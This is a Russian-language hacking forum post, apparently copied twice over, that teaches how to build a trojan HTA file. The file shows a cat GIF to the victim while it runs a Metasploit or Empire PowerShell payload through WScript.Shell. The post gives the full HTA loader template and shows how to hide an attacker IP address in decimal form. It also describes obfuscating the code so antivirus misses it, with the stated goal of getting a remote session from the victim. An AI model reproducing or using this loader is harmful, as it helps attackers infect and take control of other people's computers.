Идем искать картинку (живую) то есть gif-ку .. была выбрана эта) далее нам по требуется код:
генерируем powershell в Empire или Metasploit я выбрал ..
>>>КОД СКРИПТА<<<
далее переходим на очень полезный онлайн ресурс иногда кстати выручает для различного рода задач, например кодировке IP адреса в бинарник для последущего его скрытия, не множечко отступлю от темы покажу: например скрываем 127.0.0.1
127 = 1111111, 0 = 0 и 1 = 1 преобразовываем точки и получаем 01111111000000000000000000000001 = 2130706433 ИТОГ http: // 2130706433
так вот переводим нашу GIF-ку в формат base64, копируем полученную кодировочку и вставляем в
как видите в 17 строку)
Осталось последнее действие конвертировать, а точнее обфусцировать, то есть спрятать вредный код от антивирусов в этой замечательной программе
сохраняем полученный код в блокноте, под любым именем но в формате .hta
Заключение: При запуске у жертвы появится Ваша злая GIF-ka c котикам или c ..уем), а к Вам прилетит заветная сессия) при желании можно иконку навесить (не знаю как, если кто знает, подскажите) и ДЕТЕКТА НЕТ!!
Взято с "codeby"
генерируем powershell в Empire или Metasploit я выбрал ..
>>>КОД СКРИПТА<<<
- <html>
- <head>
- <title>NazvanieGif</title>
- <hta:application id="NazvanieGif"
- border="thin"
- borderstyle="complex"
- maximizeButton="no"
- minimizeButton="no"
- />
- </head>
- <script type="text/javascript">
- var index = -1;
- var images = [
- "data:image/gif;base64,"];
- function initGallery(){
- window.resizeTo(300,300);
- htaPayload();
- nextPicture();
- }
- function nextPicture(){
- var img;
- index = index + 1;
- if (index > images.length -1 ){
- index = 0;
- }
- img = document.getElementById("gallery");
- img.src = images[index];
- }
- function htaPayload(){
- var payload="";
- try{
- if (navigator.userAgent.indexOf("Windows") !== -1){
- new ActiveXObject("WScript.Shell").Run("CMD /C START /B " + payload, false);
- }
- }
- catch(e){
- }
- }
- </script>
- <style>
- #gallery, div {
- width: 100%;
- height: 100%;
- }
- #outer {
- text-align: center;
- }
- #inner{
- display: inline-block;
- }
- body {
- background-color: black;
- }
- </style>
- <body onload="initGallery()">
- <div id="outer">
- <div id="inner">
- <img id="gallery" onclick="nextPicture()">
- </div>
- </div>
- </body>
- </html>
далее переходим на очень полезный онлайн ресурс иногда кстати выручает для различного рода задач, например кодировке IP адреса в бинарник для последущего его скрытия, не множечко отступлю от темы покажу: например скрываем 127.0.0.1
127 = 1111111, 0 = 0 и 1 = 1 преобразовываем точки и получаем 01111111000000000000000000000001 = 2130706433 ИТОГ http: // 2130706433
так вот переводим нашу GIF-ку в формат base64, копируем полученную кодировочку и вставляем в
как видите в 17 строку)
Осталось последнее действие конвертировать, а точнее обфусцировать, то есть спрятать вредный код от антивирусов в этой замечательной программе
сохраняем полученный код в блокноте, под любым именем но в формате .hta
Заключение: При запуске у жертвы появится Ваша злая GIF-ka c котикам или c ..уем), а к Вам прилетит заветная сессия) при желании можно иконку навесить (не знаю как, если кто знает, подскажите) и ДЕТЕКТА НЕТ!!
Взято с "codeby"
Последнее редактирование:
